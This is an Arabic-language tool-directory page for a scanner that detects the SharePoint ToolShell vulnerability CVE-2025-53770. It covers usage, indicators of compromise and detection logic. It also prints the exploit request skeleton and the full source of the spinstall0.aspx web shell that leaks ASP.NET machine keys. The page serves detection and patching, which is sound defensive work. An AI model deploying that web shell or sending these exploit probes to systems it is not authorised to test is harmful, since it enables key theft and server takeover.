Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-53770-Scanner — ماسح ToolShell - CVE-2025-53770 ومعلومات الكشف | Kitploit
أدوات/GitHubGitHub/zephrfish/cve-2025-53770-scanner
أدوات دفاعيةإدارة مؤشرات الاختراق (IOC)ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقاستخبارات التهديداتالاستجابة للحوادثتحليل السجلات
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

ماسح ToolShell - CVE-2025-53770 ومعلومات الكشف

18517منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
مشاركة

ماسح الثغرة الأمنية CVE-2025-53770 في SharePoint

مُجمّع بنسبة 100% من التغريدات المتداولة حول الحمولات والهجمات المختلفة، لذا يأتي بدون أي ضمان إلخ. صُمم الماسح لتحديد الحالات المعرّضة للخطر، ويحتوي على إعدادات للاستخدامات المعروفة للاستغلال في الهجمات الفعلية، وهو مصمم بشكل أساسي للاستخدام الدفاعي لتحديد الحالات المعرّضة للخطر وتمكينك من تصحيح الثغرات.

يقوم هذا الماسح بإجراء فحوصات آلية على نشرات SharePoint من خلال:

  • إرسال طلبات POST مُعدّة بعناية إلى نقاط نهاية ToolPane في SharePoint مع حمولات استغلال
  • كشف محاولات استخراج مفتاح الجهاز (machine key) والاستغلال الناجح
  • تحديد نشر الحمولة الثانوية (spinstall0.aspx)
  • تحليل الاستجابات بحثًا عن مؤشرات الثغرة بناءً على أنماط الهجوم المرصودة
  • توفير تقارير مفصّلة بمستويات الثقة وتنبيهات الإجراء الفوري
  • دعم الفحص المتزامن لتحقيق الكفاءة

قدرات الكشف الرئيسية

حرج: كشف استخراج مفتاح الجهاز

  • يكشف استجابات استخراج مفتاح الجهاز الناجحة
  • يحدد تعرّض ValidationKey وDecryptionKey وCompatibilityMode
  • يتعرف على أنماط مفاتيح الجهاز المفصولة بالرمز | (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • يطلق تنبيهات إجراء فوري للأنظمة المخترقة

كشف الحمولة الثانوية

  • يحدد محاولات نشر spinstall0.aspx
  • يكتشف أنماط كود الحمولة C# ASP.NET
  • يتعرف على استخدام System.Web.Configuration.MachineKeySection
  • كشف المسار حسب الإصدار (SP2013: WEBSER~1\15\ مقابل SP2016+: WEBSER~1\16\)

التثبيت

  1. استنسخ المستودع:
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. ثبّت التبعيات:
pip install -r requirements.txt

الاستخدام

الاستخدام الأساسي

أنشئ ملفًا نصيًا يحتوي على المضيفات المستهدفة (مضيف واحد في كل سطر):

sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

شغّل الماسح:

python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

خيارات سطر الأوامر

الخيارالوصفالافتراضي
-i, --inputمسار ملف قائمة المضيفات (مطلوب)-
-o, --outputملف الإخراج للنتائج (.json, .csv, .txt)None
-l, --logfileمسار ملف السجل للتسجيل التفصيليNone
-t, --threadsعدد الخيوط المتزامنة10
-v, --verboseتفعيل الإخراج التفصيلي والتسجيلFalse

صيغ الإخراج

إخراج JSON (-o results.json)

[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

إخراج CSV (-o results.csv)

يوفر بيانات جدولية مناسبة للتحليل في جداول البيانات، مع أعمدة لجميع مقاييس الفحص.

إخراج نصي (-o results.txt)

صيغة مقروءة للبشر تتضمن حالة الثغرة وتفاصيل الفحص.

تفاصيل الثغرة الأمنية

تستهدف CVE-2025-53770 ثغرة إلغاء تسلسل (deserialization) في مكوّن ExcelDataSet في SharePoint، والتي تم استغلالها بنشاط في الهجمات الواقعية. يكشف الماسح عن:

أنماط الهجوم المحددة

  1. الاستغلال الأولي: طلب POST إلى /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx مع حمولة متسلسلة (serialized)
  2. استخراج مفتاح الجهاز: يعيد الاستغلال الناجح إعدادات الجهاز مفصولةً بالرمز |:
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Example: [128-256 hex chars]|HMACSHA256|[48-96 hex chars]|AES|Framework45
    
  3. الحمولة الثانوية: نشر spinstall0.aspx للوصول المستمر واستخراج المفاتيح
  4. استهداف الإصدارات: مسارات مختلفة لإصدارات SharePoint (تخطيطات 15/ مقابل 16/)

مؤشرات الاختراق المؤكدة من الاستغلال النشط

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: عادةً ما بين 7699-8000+ بايت
  • حجم الحمولة: معاملات CompressedDataTable كبيرة مشفّرة بـ base64
  • مؤشرات الاستجابة: سلاسل مفاتيح الجهاز، نشر spinstall0.aspx
  • البنية التحتية للهجوم: 65.38.121.198, 162.243.204.189, 165.22.18.129

منطق الكشف

يحلل الماسح الاستجابات بحثًا عن:

  1. أنماط استخراج مفتاح الجهاز (ثقة حرجة)
  2. مؤشرات الحمولة الثانوية (ثقة عالية)
  3. معالجة مكوّن ExcelDataSet/Scorecard (ثقة متوسطة)
  4. أنماط أخطاء ToolPane وخصائص الاستجابة الشاذة (ثقة منخفضة)

الاعتبارات الأمنية

  • هذه الأداة مصممة لاختبار الأمان المصرح به فقط
  • تأكد من الحصول على التصريح المناسب قبل فحص أي أنظمة
  • يستخدم الماسح HTTPS افتراضيًا لكنه يقبل الشهادات الموقعة ذاتيًا
  • قد تحتوي السجلات على معلومات حساسة - قم بتأمينها بشكل مناسب
  • ضع في اعتبارك تأثير الشبكة عند استخدام أعداد كبيرة من الخيوط

مثال لجلسة الفحص

$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Starting scan of 150 hosts with 10 threads...
Target CVE: CVE-2025-53770 (SharePoint ExcelDataSet deserialization)
Logging to: scan.log
Results will be saved to: vuln-results.json

[+] VULNERABLE [CRITICAL]: sp-prod-01.acme.local
[-] Not vulnerable: sp-dev-02.acme.local  
[!] ERROR: offline-sp.acme.local - Connection timeout
[+] VULNERABLE [HIGH]: sp-legacy.acme.local
Progress: 50/150 (33.3%)
Progress: 100/150 (66.7%)
Progress: 150/150 (100.0%)

============================================================
SCAN COMPLETE
============================================================
Total hosts scanned: 150
Vulnerable hosts: 3
Success rate: 97.3%

VULNERABLE HOSTS (CVE-2025-53770):

  CRITICAL - MACHINE KEY EXTRACTED (1 hosts):
    • sp-prod-01.acme.local (Response time: 0.85s, Version: 2016+)
      WARNING: IMMEDIATE ACTION REQUIRED: Machine keys compromised

  HIGH CONFIDENCE (1 hosts):
    • sp-legacy.acme.local (Response time: 1.23s, Version: 2013-2016)

  LOW CONFIDENCE (1 hosts):
    • sp-archive.acme.local (Response time: 2.10s, Version: Unknown)

Detailed results saved to: vuln-results.json

استكشاف الأخطاء وإصلاحها

المشكلات الشائعة

  1. انتهاء مهلة الاتصال: قم بزيادة المهلة أو تقليل عدد الخيوط
  2. أخطاء SSL: يعطّل الماسح تحذيرات SSL افتراضيًا
  3. أخطاء الأذونات: تأكد من صلاحية الكتابة لملفات الإخراج/السجل
  4. استخدام الذاكرة: راقبه عند استخدام قوائم مضيفات كبيرة

تحليل السجلات

فعّل التسجيل التفصيلي (-v) وملفات السجل (-l) لاستكشاف الأخطاء التفصيلي:

tail -f scan.log

تحليل الاستغلال

الحمولات الهجومية المرصودة

يتضمن الماسح كشفًا لأنماط الاستغلال المؤكدة التي رُصدت في الهجمات النشطة:

بنية الحمولة الأساسية

POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[ExcelDataSet payload with CompressedDataTable containing serialized exploit]

الحمولة الثانوية (spinstall0.aspx)

<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

صيغة استجابة مفتاح الجهاز المتوقعة

ValidationKey: [128-256 character hex string]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [48-96 character hex string] 
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40
تنزيل الأداة